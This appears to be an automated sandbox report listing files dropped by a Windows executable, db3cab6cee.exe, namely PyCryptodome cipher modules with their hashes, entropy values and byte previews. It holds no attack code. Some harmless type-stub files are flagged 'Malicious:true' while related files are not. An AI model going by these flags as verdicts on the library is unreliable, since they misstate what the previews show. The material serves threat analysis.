                                                                                                                                            Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OfbMode']....class OfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_openpgp.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6378
                                                                                                                                            Entropy (8bit):5.441750266001705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:E8N+Z1+r1IGXC9aFst834mGPUAt834wmp60nxBXGskDrvv:f+qZR0FU44OU4RpRxEn
                                                                                                                                            MD5:9D71573B53586177431DB96B9FF56362
                                                                                                                                            SHA1:B103C53FCC82F90A73D8DF586BE4EBF9A16FE46E
                                                                                                                                            SHA-256:5FD3BDDFB8082E4F2BE8E997805FDE42C49CDEE40D0E70374E8FD31366E846E0
                                                                                                                                            SHA-512:480F315D7F76A60FDB7B40DF97A689A91BFF6A32F1B4783D49D729A4900F402F3C6220EFE4147206162D33D51076EBFB0FA3697E521CC95DE3E4ED9805B5FA59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........ec.........................J.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d.S.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc.....................$.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.S.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c.....................d.....|.j.........|._.........d.|._...........|.j.........|.|.j.........f.d.|.j...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_openpgp.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):576
                                                                                                                                            Entropy (8bit):4.621504702467695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1Ro8s7REYB6IvIY3FDUCpu8RypqIY3fmIY3fm1Ap/ILFq6R5wnFq6R5j:1RM7C8T3SCpTB3632A9KnReFnRN
                                                                                                                                            MD5:C1EADE4DE0796F8C003DBB655E410274
                                                                                                                                            SHA1:283080AEFA8D7F00772CE108277688D55519EF46
                                                                                                                                            SHA-256:5E1521B1EA98D146374597A94FF5DF82FBE49F7C3DC06F6DB03379E1EA79D7E5
                                                                                                                                            SHA-512:3D2601FFBB3EC84FDEF28FBF4F409CBBF60D220B394D256FD13728EF5F0CC587FC2EDB00C868C10EEF7E0303508949D79DC23F3998E5CE2D4942A2A625BFC676
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OpenPgpMode']....class OpenPgpMode(object):.. block_size: int.. iv: Union[bytes, bytearray, memoryview].. IV: Union[bytes, bytearray, memoryview].. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. iv: Buffer,.. cipher_params: Dict) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_siv.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15323
                                                                                                                                            Entropy (8bit):5.401837017215877
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5q41BKw/NqrE9fLihays57hMav+zGn1E3:5P/gryfLihu57c53
                                                                                                                                            MD5:F04AA53B64EF93A7989F8D78C6BB93C7
                                                                                                                                            SHA1:A4D5EF85B7D79A591721E9A603F0034E489AFC4C
                                                                                                                                            SHA-256:08A7F042F0505B86D439096DCCA010C6C379FE421DB1EF35F3C31EA87C5661DA
                                                                                                                                            SHA-512:3C41C484EAF45BEFA99BC89A54DFC84C7DA149B1E0E93AA83453FA92809DE58596FA21F042082A19966B3A931C12548A1F47AAA4411AB904963A13CA8FB55A85
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eA8.............................d.Z.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d.S.).z-.Synthetic Initialization Vector (SIV) mode....SivMode.....)...hexlify..unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)..._S2V)...BLAKE2s)...get_random_bytesc.....................X.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.S.).r....a....Synthetic Initialization Vector (SIV)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed, and it will. still be subject to authentication. The decryption step tells the receiver. if the message comes from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message - including the. header

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_siv.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1299
                                                                                                                                            Entropy (8bit):4.379657025743841
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7ClDTglT3RzEA9unReFnR7PtWLn8no0E+XW3oIQ:cSklORuWLn8nlEF49
                                                                                                                                            MD5:FB584A8E53BC1B138B3932BDF16901D5
                                                                                                                                            SHA1:CF4F2426C15F17BD613A304B3E7F19A181E2035E
                                                                                                                                            SHA-256:80DAE2A187B04F2E3729BCDF78DE0DB31E22CA0922AD420F65077C448F1538E5
                                                                                                                                            SHA-512:05D214D0B39CA5566EA833772207D823AF350AEDDAF4A76C9569024D2A374D48FC48A0729B226A1A934E7CA179A5130ABB4232D3412BA27C9DA3DB214A9358BA
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Tuple, Dict, Optional, overload....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['SivMode']....class SivMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. kwargs: Dict) -> None: ..... .. def update(self, component: Buffer) -> SivMode: ....... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ....... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer) -> Tuple[bytes, bytes]: ..... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer,..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_pkcs1_decode.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13824
                                                                                                                                            Entropy (8bit):5.236611028290556
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:osiHXqpoUol3xZhRyQX5lDnRDFFav+tcqgRvE:K6D+XBDfDgRvE
                                                                                                                                            MD5:7FA5B1642D52FABFE1D3EBD1080056D4
                                                                                                                                            SHA1:56B9E87D613EE9A8B6B71A93ED5FA1603886139A
                                                                                                                                            SHA-256:88C7EC96B9E1D168005B3A8727AAA7F76B4B2985083ED7A9FB0A2AB02446E963
                                                                                                                                            SHA-512:9E0BF47060A2B7AC8FFD2CB8B845D44013C068BFE74926A67496D79BCB513506625BDA1DDF18ECE7777D1379F036506F19457D0A43FA618A8F75664C47798E64
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...R...*...U...*..R...*...*...*...U...*...U...*...U...*.....*.....*...}..*.....*..Rich.*..........................PE..d...N..e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_aes.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):36352
                                                                                                                                            Entropy (8bit):6.558039926510444
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:Dz5P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuTLg46:DzdqWB7YJlmLJ3oD/S4j990th9VTsC
                                                                                                                                            MD5:E63FC8375E1D8C47FBB84733F38A9552
                                                                                                                                            SHA1:995C32515AA183DA58F970CEDC6667FAE166615A
                                                                                                                                            SHA-256:F47F9C559A9C642DA443896B5CD24DE74FED713BDF6A9CD0D20F5217E4124540
                                                                                                                                            SHA-512:4213189F619E7AA71934033CABA401FE93801B334BA8D8EAFEDA89F19B13224C516E4BB4F4F93F6AE2C21CD8F5586D3FFAC3D16CB1242183B9302A1F408F6F6A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d...L..e.........." ...%.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_aesni.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15872
                                                                                                                                            Entropy (8bit):5.285246086368036
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:jJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4mqccqgwYUMvEW:ZkRwi3wO26Ef+yuIm9PfDewgwYUMvE
                                                                                                                                            MD5:A914F3D22DA22F099CB0FBFBBB75DDBF
                                                                                                                                            SHA1:2834AEB657CA301D722D6D4D1672239C83BE97E3
                                                                                                                                            SHA-256:4B4DBF841EC939EF9CC4B4F1B1BA436941A3F2AF2F4E34F82C568DFC09BA0358
                                                                                                                                            SHA-512:15BF5FCE53FB2C524054D02C2E48E3DDC4EAC0C1F73325D58B04DFE17259C208FFAC0A7C634FBC2CF1A08E7F28C1FD456061BA0838F4316EB37514E1E8D4C95F
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........TX..:...:...:.....:..;...:...;...:...;...:..?...:..>...:..9...:..R2...:..R:...:..R....:..R8...:.Rich..:.................PE..d...L..e.........." ...%. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text...h........ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_arc2.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16384
                                                                                                                                            Entropy (8bit):5.505232918566824
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:9d9VkyQ5f8vjVaCHpKpTTjaNe7oca2DWZQ2dhmdcqgwNeecBih:rkP5cjIGpKlqD2DakzgwNeE
                                                                                                                                            MD5:9F1A2A9D731E7755EE93C82C91FA5FE2
                                                                                                                                            SHA1:41085FBE84E1B98A795871033034FA1F186274EF
                                                                                                                                            SHA-256:17F3EAF463868B015583BD611BE5251E36AAB616522FF4072011B3D72F6F552F
                                                                                                                                            SHA-512:7E29D4729837D87AEF34CFA7B1F86DFBB81907CD11FC575C4ED1B8A956409492315BFA76ADE4D7C51E51E37E5D098A7F4FEE4C58D86D0E6245A4AA0D392D488A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...L..e.........." ...%."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_blowfish.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20992
                                                                                                                                            Entropy (8bit):6.061115794354147
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:pUv5cJMOZA0nmwBD+XpJgLa0Mp8QHg4P2llyM:GK1XBD+DgLa1gTi
                                                                                                                                            MD5:883DE82B3B17F95735F579E78A19D509
                                                                                                                                            SHA1:3EC7259ACA3730B2A6F4E1CA5121DB4AB41C619E
                                                                                                                                            SHA-256:67FF6C8BBDC9E33B027D53A26DF39BA2A2AD630ACCE1BAC0B0583CA31ADF914F
                                                                                                                                            SHA-512:602915EAA0933F5D1A26ECC1C32A8367D329B12794CBF2E435B1704E548858E64710AB52BC6FC14FC98DF0B8EEBDE2B32A35BCF935079CC8E2412C07DF5303FD
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...L..e.........." ...%.$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cast.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25088
                                                                                                                                            Entropy (8bit):6.475398255636883
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:Zc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy7IYgLWi:q6H1TZXX5XmrXA+NNxWi0dLWi
                                                                                                                                            MD5:0AC22DA9F0B2F84DE9D2B50D457020C1
                                                                                                                                            SHA1:682E316AE958121D0E704CAB0F78CCAD42C77573
                                                                                                                                            SHA-256:480C79C713AD15328E9EB9F064B90BCDCB5AAD149236679F97B61218F6D2D200
                                                                                                                                            SHA-512:11C04D55C5E73583D658E0918BD5A37C7585837A6E0F3C78AEF10A5D7A5C848B0620028177A9D9B0AD5DB882B2A26624F92BEFC9BC8F8A23C002723E50DD80A5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...M..e.........." ...%.$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....#.......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cbc.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):4.839420412830416
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CF/1nb2mhQtkr+juOxKbDbRHcqgYvEkrK:42f6iuOsbDXgYvEmK
                                                                                                                                            MD5:6840F030DF557B08363C3E96F5DF3387
                                                                                                                                            SHA1:793A8BA0A7BDB5B7E510FC9A9DDE62B795F369AE
                                                                                                                                            SHA-256:B7160ED222D56925E5B2E247F0070D5D997701E8E239EC7F80BCE21D14FA5816
                                                                                                                                            SHA-512:EDF5A4D5A3BFB82CC140CE6CE6E9DF3C8ED495603DCF9C0D754F92F265F2DCE6A83F244E0087309B42930D040BF55E66F34504DC1C482A274AD8262AA37D1467
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...N..e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cfb.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13824
                                                                                                                                            Entropy (8bit):4.905258571193623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:fRgPX8lvI+KnwSDTPUDEnKWPXcqgzQkvEd:4og9rUD/mpgzQkvE
                                                                                                                                            MD5:7256877DD2B76D8C6D6910808222ACD8
                                                                                                                                            SHA1:C6468DB06C4243CE398BEB83422858B3FED76E99
                                                                                                                                            SHA-256:DBF703293CFF0446DFD15BBAEDA52FB044F56A353DDA3BECA9AADD8A959C5798
                                                                                                                                            SHA-512:A14D460D96845984F052A8509E8FC44439B616EEAE46486DF20F21CCAA8CFB1E55F1E4FA2F11A7B6AB0A481DE62636CEF19EB5BEF2591FE83D415D67EB605B8E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d...N..e.........." ...%..... ......P.....................................................`..........................................9.......9..d....`.......P..d............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ctr.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14848
                                                                                                                                            Entropy (8bit):5.300728193650235
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:jGYJ1gSHxKkwv0i8XSi3Sm57NEEE/qexUEtDr6krRcqgUF6+6vEX:jR01si8XSi3SACqe7tDlDgUUjvE
                                                                                                                                            MD5:B063D73E5AA501060C303CAFBC72DAD3
                                                                                                                                            SHA1:8C1CA04A8ED34252EB233C993DDBA17803E0B81E
                                                                                                                                            SHA-256:98BACA99834DE65FC29EFA930CD9DBA8DA233B4CFDFC4AB792E1871649B2FE5C
                                                                                                                                            SHA-512:8C9AD249F624BDF52A3C789C32532A51D3CC355646BD725553A738C4491EA483857032FB20C71FD3698D7F68294E3C35816421DFF263D284019A9A4774C3AF05
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K,..*B..*B..*B..R...*B..UC..*B.RC..*B..*C..*B..UG..*B..UF..*B..UA..*B..J..*B..B..*B....*B..@..*B.Rich.*B.........................PE..d...O..e.........." ...%..... ......P.....................................................`..........................................9......x:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_des.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):57856
                                                                                                                                            Entropy (8bit):4.260136375669177
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:9RUqVT1dZ/GHkJnYcZiGKdZHDLtiduprZvZY0JAIg+v:9rHGHfJidIK
                                                                                                                                            MD5:3AEA5302F7F03EDEFF49D1C119C61693
                                                                                                                                            SHA1:DBDDE1C10B253744153FC1F47C078AAACCF3F3A6
                                                                                                                                            SHA-256:E5DDA67D4DF47B7F00FF17BE6541CA80BDB4B60E1F6FD1A7D7F115DDF7683EE5
                                                                                                                                            SHA-512:DD42C24EDAF7E1B25A51BC8C96447496B3289C612C395CA7BD8BF60A162229C2E0CA0432CDDF1CB2D65D80189DB02BEE42FFD0E7DD9E5FC19278CA3FD593AB2C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d...M..e.........." ...%.8...................................................0............`.....................................................d...............l............ ..4...................................@...@............P...............................text....7.......8.................. ..`.rdata..f....P.......<..............@..@.data...8...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_des3.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):58368
                                                                                                                                            Entropy (8bit):4.276947153784193
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:98Uqho9weF5/eHkRnYcZiGKdZHDL7idErZ8ZYXGg:9gCneH//idv2
                                                                                                                                            MD5:BA5BA714AEBFD8130EB6E0983FBAE20B
                                                                                                                                            SHA1:3309C26A9083EC3AD982DD3D6630FCC16465F251
                                                                                                                                            SHA-256:861167DFEB390261E538D635EAD213E81C1166D8D85A496774FBF2EBFF5A4332
                                                                                                                                            SHA-512:309CC3FD8DB62517AE70B404C5ACD01052F10582A17123135CD1A28D3A74AB28F90A8E7ED7D2061A4B6C082F85E98DA822D43986FC99367B288A72BA9F8B5569
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d...N..e.........." ...%.:...................................................0............`.................................................P...d............................ ..4...................................@...@............P...............................text...x9.......:.................. ..`.rdata.......P.......>..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ecb.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10752
                                                                                                                                            Entropy (8bit):4.579354442149926
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:j0qVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EpmFWLOXDwoYPj15XkcX6gbW6z:pVddiT7pgTctEEI4qXDe11kcqgbW6
                                                                                                                                            MD5:1C74E15EC55BD8767968024D76705EFC
                                                                                                                                            SHA1:C590D1384D2207B3AF01A46A5B4F7A2AE6BCAD93
                                                                                                                                            SHA-256:0E3EC56A1F3C86BE1CAA503E5B89567AA91FD3D6DA5AD4E4DE4098F21270D86B
                                                                                                                                            SHA-512:E96CA56490FCE7E169CC0AB803975BAA8B5ACB8BBAB5047755AE2EEAE177CD4B852C0620CD77BCFBC81AD18BB749DEC65D243D1925288B628F155E8FACDC3540
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d...N..e.........." ...%............P........................................p............`.........................................p'......((..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_eksblowfish.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22016
                                                                                                                                            Entropy (8bit):6.143744403797058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:7Uv5cRUtPQtjLJiKMjNrDF6pJgLa0Mp8Qy0gYP2lXCM:UKR8I+K0lDFQgLa1WzU
                                                                                                                                            MD5:E7826C066423284539BD1F1E99BA0CC6
                                                                                                                                            SHA1:DA7372EEB180C2E9A6662514A8FA6261E04AC6DC
                                                                                                                                            SHA-256:0E18B7C2686BB954A8EE310DD5FDB76D00AC078A12D883028BFFC336E8606DA2
                                                                                                                                            SHA-512:55F8B00B54F3C3E80803D5A3611D5301E29A2C6AF6E2CAA36249AEBA1D4FCC5A068875B34D65106C137F0455F11B20226B48EEF687F5EA73DFEA3C852BF07050
                                                                                                                                            Malicious:true
